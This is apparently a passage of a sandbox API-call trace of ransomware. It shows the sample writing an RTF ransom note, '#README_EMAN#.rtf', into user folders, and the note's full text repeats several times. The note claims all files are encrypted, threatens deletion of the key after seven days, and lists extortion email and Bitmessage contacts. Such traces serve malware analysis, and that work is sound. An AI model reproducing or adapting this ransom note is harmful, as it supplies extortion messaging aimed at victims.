\\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\r", lpUsedDefaultChar=0x0) returned 8717 [0294.914] WriteFile (in: hFile=0x2ec, lpBuffer=0x1ef9b08*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9b08*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0294.915] CloseHandle (hObject=0x2ec) returned 1 [0294.915] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\#readme_eman#.rtf")) returned 0xffffffff [0294.915] GetLastError () returned 0x2 [0294.915] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0294.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.915] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) 